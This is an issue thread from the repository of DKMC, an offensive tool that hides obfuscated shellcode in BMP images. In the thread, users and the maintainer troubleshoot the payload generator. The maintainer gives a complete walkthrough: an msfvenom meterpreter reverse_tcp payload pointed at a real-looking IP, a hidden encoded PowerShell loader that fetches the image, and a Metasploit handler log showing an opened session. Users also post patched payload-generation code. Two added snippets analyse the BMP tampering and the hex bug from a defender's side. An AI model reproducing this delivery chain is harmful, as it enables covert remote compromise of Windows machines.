shows error about dkmc HOT 23 CLOSED

amainyebriggs commented on August 23, 2024
shows error

from dkmc.

Comments (23)

Mr-Un1k0d3r commented on August 23, 2024

Glad you figured it out.

Mr-Un1k0d3r commented on August 23, 2024

Shellcode format should be \x00\x00\x00; you are probably not using the right format.

amainyebriggs commented on August 23, 2024

How do I do that?

amainyebriggs commented on August 23, 2024

I used the SC; it's still the same error.

leosilberg commented on August 23, 2024

Hey man. Great work with this tool. However, I'm also getting the error message after using sc command.

Mr-Un1k0d3r commented on August 23, 2024

Before launching the tool, make sure to create the output folder:

$ git clone https://github.com/Mr-Un1k0d3r/DKMC
$ cd DKMC
$ mkdir output

msfvenom -a x86 -p windows/meterpreter/reverse_tcp -e generic/none -f raw LPORT=8080 LHOST=24.37.41.158 > payload

(shellcode)>>> set source /root/payload
[+] source value is set.

(shellcode)>>> run
[+] Shellcode:

(shellcode)>>> exit

(generate)>>> set shellcode [...]
[+] shellcode value is set.

(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x35af22c7
[+] Shellcode size 0x12b (299) bytes
[+] Adding 1 bytes of padding
[+] Generating magic bytes 0xa1957f94
[+] Final shellcode length is 0x17b (379) bytes
[+] New BMP header set to 0x424de980c50300
[+] New height is 0x0e010000 (270)
[+] Successfully save the image. (/root/DKMC/output/output-1505309035.bmp)


If you are following this path it should work as expected.
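
The `generate` output above logs a new header of 0x424de980c50300 and a height lowered from 275 to 270, which leaves a file whose BMP fields no longer agree with its contents. A defender-side check for that inconsistency, as an added example that is not part of the original comment or of DKMC; the function names and the sample images (constructed, zero-filled, 24-bit, no payload) are assumptions.

```python
import struct

FILE_HDR = struct.Struct("<2sIHHI")       # bfType, bfSize, reserved1, reserved2, bfOffBits
INFO_HDR = struct.Struct("<IiiHHIIiiII")  # BITMAPINFOHEADER, 40 bytes


def make_bmp(width, height, bpp=24):
    """Build a well-formed uncompressed BMP with zeroed pixels (constructed sample)."""
    row = ((width * bpp + 31) // 32) * 4  # each row is padded to a 4-byte boundary
    pixels = bytes(row * height)
    off_bits = FILE_HDR.size + INFO_HDR.size
    return (FILE_HDR.pack(b"BM", off_bits + len(pixels), 0, 0, off_bits)
            + INFO_HDR.pack(40, width, height, 1, bpp, 0, len(pixels), 0, 0, 0, 0)
            + pixels)


def inspect_bmp(data):
    """Return a list of findings; an empty list means the header is self-consistent."""
    if len(data) < FILE_HDR.size + INFO_HDR.size or data[:2] != b"BM":
        return ["not a BMP with BITMAPINFOHEADER"]
    _, bf_size, _, _, off_bits = FILE_HDR.unpack_from(data, 0)
    _, width, height, _, bpp, compression = struct.unpack_from(
        "<IiiHHI", data, FILE_HDR.size)
    findings = []
    # 1. The size field at offset 2 should equal the real file length.
    if bf_size != len(data):
        findings.append("bfSize mismatch: header says %d, file is %d bytes"
                        % (bf_size, len(data)))
    # 2. Heuristic: the logged header puts 0xE9 where the size field starts.
    if data[2] == 0xE9:
        findings.append("jump opcode after magic: byte 2 is 0xE9 (x86 near JMP)")
    # 3. Uncompressed images should not carry rows beyond the declared height.
    if compression == 0 and width > 0 and bpp > 0:
        row = ((width * bpp + 31) // 32) * 4
        surplus = len(data) - off_bits - row * abs(height)
        if surplus > 0:
            findings.append("surplus pixel data: %d bytes beyond the declared height"
                            % surplus)
    return findings


# Constructed samples: a clean 300 x 275 image, and a copy whose header fields are
# overwritten with the values the tool logged above. No payload is embedded.
CLEAN = make_bmp(300, 275)
_tampered = bytearray(CLEAN)
_tampered[0:7] = bytes.fromhex("424de980c50300")  # "New BMP header set to ..."
_tampered[22:26] = bytes.fromhex("0e010000")      # "New height is ... (270)"
TAMPERED = bytes(_tampered)

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(name, inspect_bmp(blob) or "consistent")
```

The checks are heuristics: a writer that leaves bfSize wrong or appends metadata after the pixel array will also trip checks 1 and 3, so treat a hit as a reason to look closer.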

amainyebriggs commented on August 23, 2024

I have followed the steps; it still outputs the same error. I am using Kali Linux i386.

leosilberg commented on August 23, 2024

Yeah still having issues. Testing on Windows 10 Python 2.7

(generate)>>> set shellcode [...]
[+] shellcode value is set.

(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x11943dc6
[+] Shellcode size 0x12b (299) bytes
[+] Adding 1 bytes of padding
[+] Generating magic bytes 0x37621f45
[-] >>> Something when wrong during the obfuscation. Wrong shellcode format?

Mr-Un1k0d3r commented on August 23, 2024

Can you try to update gen.py with the one I attached and show me the error stack trace?

gen.py is located in the module/ folder.

gen.txt

leosilberg commented on August 23, 2024

Possible missing import?

(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x5242695b
[+] Shellcode size 0xc7 (199) bytes
[+] Adding 1 bytes of padding
[+] Generating magic bytes 0xf2e29eaaL
Traceback (most recent call last):
  File "dkmc.py", line 39, in <module>
    mod.show_menu()
  File "C:\DKMC-master\module\module.py", line 21, in show_menu
    self.do_action()
  File "C:\DKMC-master\module\module.py", line 42, in do_action
    self.exec_action(data)
  File "C:\DKMC-master\module\module.py", line 57, in exec_action
    self.run_action()
  File "C:\DKMC-master\module\gen.py", line 44, in run_action
    shellcode = self.gen_shellcode(self.vars["shellcode"][0])
  File "C:\DKMC-master\module\gen.py", line 76, in gen_shellcode
    shellcode = hex(magic)[2:].decode("hex") + shellcode
  File "C:\Python27\lib\encodings\hex_codec.py", line 42, in hex_decode
    output = binascii.a2b_hex(input)
TypeError: Odd-length string

Mr-Un1k0d3r commented on August 23, 2024

Okay, this is caused by your copy-paste; it probably adds some \r\n at the end when you copy it. To avoid that I'll strip the input before processing.

Mr-Un1k0d3r commented on August 23, 2024

Pushed the patch to remove \r & \n.

git pull and you should be good.

leosilberg commented on August 23, 2024

Still no luck with your code unfortunately.

I have been playing around with gen.py, specifically the gen_shellcode function. It seems the shellcode length gets messed up when adding other bytes.

(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x128b4be7
[+] Shellcode size 0x31c (796) bytes
[+] Generating magic bytes 0x4349e106
[+] Shellcode size 0x324 (804) bytes
[+] Shellcode size 0x324 (804) bytes
[+] Shellcode size 0x377 (887) bytes
[+] Shellcode size 0x377 (887) bytes
[+] Adding 1 bytes of padding
[+] Shellcode size 0x378 (888) bytes
[+] Final shellcode length is 0x370 (880) bytes
[+] New BMP header set to 0x424de98bc30300
[+] New height is 0x0e010000 (270)
[+] Successfully save the image. (C:\DKMC-master/output/output-1505416245.bmp)

This doesn't let me execute the shell code but it's progress

Mr-Un1k0d3r commented on August 23, 2024

This is the expected behavior. This module only generates the final payload. You can now use the image C:\DKMC-master/output/output-1505416245.bmp to deliver your payload.

The ps and web modules allow you to generate the PowerShell one-liner pretty easily.

leosilberg commented on August 23, 2024

Powershell and web server work perfectly. But I'm still not getting code execution. I had to remove in the pad_shellcode shellcode.replace("\x","").decode. I doubt that the format is correct to execute. I've no idea what to do.

Mr-Un1k0d3r commented on August 23, 2024

Here is the complete walkthrough of how to get a shell; it works #1 on my side.

Tool output:

=====================================================================
|                                                                   |
| Module to generate shellcode out of raw metasploit shellcode file |
|                                                                   |
=====================================================================


Allowed options:

        [*] (show)      Show module variables
        [*] (set)       Set value (set key value)
        [*] (run)       Run the module
        [*] (exit)      Go back to the main menu

Module Variables description:

        source      Path to the raw shellcode file


Current variable value:

        source      =

(shellcode)>>> set source SHELLCODE
        [+] source value is set.

(shellcode)>>> run
        [+] Shellcode:

(shellcode)>>> exit

=================================================================================
|                                                                               |
| Module to generate malicious Bitmap image with embedded obfuscation shellcode |
|                                                                               |
=================================================================================


Allowed options:

        [*] (show)      Show module variables
        [*] (set)       Set value (set key value)
        [*] (run)       Run the module
        [*] (exit)      Go back to the main menu

Module Variables description:

        debug       Show debug output. More verbose
        source      Image source file path
        shellcode   Shellcode payload using \x41\x41 format
        output      Output file path


Current variable value:

        debug       = false
        source      = sample/default.bmp
        shellcode   =
        output      = output/output.bmp

(generate)>>> set shellcode [...]
        [+] shellcode value is set.

(generate)>>> run
        [+] Image size is 300 x 275
        [+] Generating obfuscation key 0x3b1bf4e3
        [+] Shellcode size 0x12b (299) bytes
        [+] Adding 1 bytes of padding
        [+] Generating magic bytes 0xdfe6936e
        [+] Final shellcode length is 0x17b (379) bytes
        [+] New BMP header set to 0x424de980c50300
        [+] New height is 0x0e010000 (270)
        [+] Successfully save the image. (/home/me/DKMC/output/output.bmp)

(generate)>>> exit

=========================================
|                                       |
| Module to generate Powershell payload |
|                                       |
=========================================


Allowed options:

        [*] (show)      Show module variables
        [*] (set)       Set value (set key value)
        [*] (run)       Run the module
        [*] (exit)      Go back to the main menu

Module Variables description:

        url         Url that point to the malicious image
        rand        Use random variables name


Current variable value:

        url         =
        rand        = true

(powershell)>>> set url http://10.0.0.153:8080/output.bmp
        [+] url value is set.

(powershell)>>> run
        [+] Powershell script:
powershell.exe -nop -w hidden -enc [...]

(powershell)>>> exit

=================================
|                               |
| Module to launch a web server |
|                               |
=================================


Allowed options:

        [*] (show)      Show module variables
        [*] (set)       Set value (set key value)
        [*] (run)       Run the module
        [*] (exit)      Go back to the main menu

Module Variables description:

        folder      Base folder used to deliver files
        certificate Certificate path
        port        Port used to bind the web server
        https       Use HTTPS


Current variable value:

        folder      = /home/charles.hamilton/DKMC/output/
        certificate = core/util/cert/default.pem
        port        = 80
        https       = false

(web)>>> run
        [+] Starting web server on port 80


        [+] Stopping web server

(web)>>> set port 8080
        [+] port value is set.

(web)>>> run
        [+] Starting web server on port 8080

On the PowerShell console I ran the PowerShell one-liner:

powershell.exe -nop -w hidden -enc [...]

Then, in the tool, notice that the payload is fetched:

(web)>>> run
        [+] Starting web server on port 8080

10.0.0.153 - - [14/Sep/2017 16:44:35] "GET /output.bmp HTTP/1.1" 200 -

        [+] Stopping web server

On the metasploit console:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > set lhost 24.37.41.158
lhost => 24.37.41.158
msf exploit(handler) > exploit

[*] Started reverse handler on 24.37.41.158:8080
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 24.37.41.154
[*] Meterpreter session 1 opened (24.37.41.158:8080 -> 24.37.41.154:29608) at 2017-09-14 17:00:05 -0400

meterpreter >

carnal0wnage commented on August 23, 2024

I'm getting an issue where it won't let me paste the full amount of shellcode. Any idea on that one?

(generate)>>> set shellcode [...]

It won't let me enter any more text.

Mr-Un1k0d3r commented on August 23, 2024

It may be a limitation of your terminal. I used the same shellcode that you pasted and added more to it.

=================================================================================
|                                                                               |
| Module to generate malicious Bitmap image with embedded obfuscation shellcode |
|                                                                               |
=================================================================================


Allowed options:

        [*] (show)      Show module variables
        [*] (set)       Set value (set key value)
        [*] (run)       Run the module
        [*] (exit)      Go back to the main menu

Module Variables description:

        debug       Show debug output. More verbose
        source      Image source file path
        shellcode   Shellcode payload using \x41\x41 format
        output      Output file path


Current variable value:

        debug       = false
        source      = sample/default.bmp
        shellcode   =
        output      = output/output-1505429835.bmp

(generate)>>> set shellcode set shellcode [...]
        [+] shellcode value is set.

(generate)>>> show
        debug       = false
        source      = sample/default.bmp
        shellcode   = set shellcode [...]
        output      = output/output-1505429835.bmp

(generate)>>>

The show command shows the content of the "variable", which contains the whole string without issue. I tried on a Cygwin terminal on Windows and an Ubuntu terminal, and neither had the issue. The input is captured using the raw_input() function; there is no limitation implemented on my side.

carnal0wnage commented on August 23, 2024

Yup, seems to be an OSX-ism. Works fine in Ubuntu. If I track it down I'll do an additional comment.

ty!

leosilberg commented on August 23, 2024

Finally managed to get it to run. The problem seems to be in the random int generation as the hex value length was uneven. I worked round this by cutting the hex. This is my modified gen_shellcode function.

def gen_shellcode(self, shellcode):
    key = self.gen_key()
    self.ui.print_msg("Generating obfuscation key 0x%s" % key.encode("hex"))
    shellcode = self.pad_shellcode(shellcode)
    self.ui.print_msg(len(shellcode))
    magic = self.gen_magic()

    self.ui.print_msg("Generating magic bytes %s" % hex(magic))
    self.ui.print_msg((hex(magic)[2:10]))
    shellcode = hex(magic)[2:10].decode("hex") + shellcode
    self.ui.print_msg(len(shellcode))
    shellcode = self.xor_payload(shellcode, key)
    self.ui.print_msg(len(shellcode))
    size = len(shellcode)
    shellcode = self.set_decoder(hex(magic)[2:10].decode("hex"), (size - 4)) + shellcode
    self.ui.print_msg(len(shellcode))
    for i in range(1, 5):
        shellcode = shellcode.replace("[RAND" + str(i) + "]", self.gen_pop(hex(self.gen_magic())[2:10].decode("hex")))
    self.ui.print_msg("Final shellcode length is %s (%d) bytes" % (hex(len(shellcode)), len(shellcode)))
    if self.is_debug():
        print
    return shellcode

I'm sure this will solve the original error message of this thread

Mr-Un1k0d3r commented on August 23, 2024

Interesting, I'll try to reproduce the bug on my side. Kind of odd that the hex function returns a different output on Windows.
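
Why the "Odd-length string" failure depends on the platform, as an added example (not code from the thread or from DKMC) that emulates Python 2's hex() in Python 3: hex() appends "L" to any value above sys.maxint, which is 2**31 - 1 on Windows and on 32-bit Linux, and it never zero-pads. It assumes the magic value is a random 32-bit integer; the helper names and the two small test values are constructed.

```python
import binascii
import struct

INT_MAX_32 = 2**31 - 1  # sys.maxint where C long is 32 bits: Windows, Linux i386
INT_MAX_64 = 2**63 - 1  # sys.maxint on 64-bit Linux


def py2_hex(n, maxint):
    """Emulate Python 2 hex(): values above sys.maxint are longs and get an 'L'."""
    return "0x%x" % n + ("L" if n > maxint else "")


def decode_hex_slice(n, maxint, end=None):
    """Mirror hex(magic)[2:end].decode("hex"); return the bytes or the error text."""
    try:
        return binascii.unhexlify(py2_hex(n, maxint)[2:end])
    except binascii.Error as exc:
        return "error: %s" % exc


def fixed_width(n):
    """Always four big-endian bytes, whatever the platform or the leading zeros."""
    return struct.pack(">I", n)


if __name__ == "__main__":
    cases = [
        # (description, value, sys.maxint, slice end)
        ("traceback value, 32-bit long, [2:]", 0xF2E29EAA, INT_MAX_32, None),
        ("traceback value, 64-bit long, [2:]", 0xF2E29EAA, INT_MAX_64, None),
        ("traceback value, 32-bit long, [2:10]", 0xF2E29EAA, INT_MAX_32, 10),
        ("7 hex digits (constructed), [2:10]", 0x0ABC1234, INT_MAX_32, 10),
        ("6 hex digits (constructed), [2:10]", 0x00BC1234, INT_MAX_64, 10),
    ]
    for label, value, maxint, end in cases:
        print("%-40s %r" % (label, decode_hex_slice(value, maxint, end)))
    print("%-40s %r" % ("struct.pack('>I', 0x00BC1234)", fixed_width(0x00BC1234)))
```

The `[2:10]` slice removes the "L" but still fails or returns fewer than four bytes when the value has leading zero digits; a fixed-width encoding such as `struct.pack(">I", n)` or `"%08x" % n` avoids both cases.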

leosilberg commented on August 23, 2024

I think there's one still missing on line 73.

Mr-Un1k0d3r commented on August 23, 2024

Fixed, thanks.
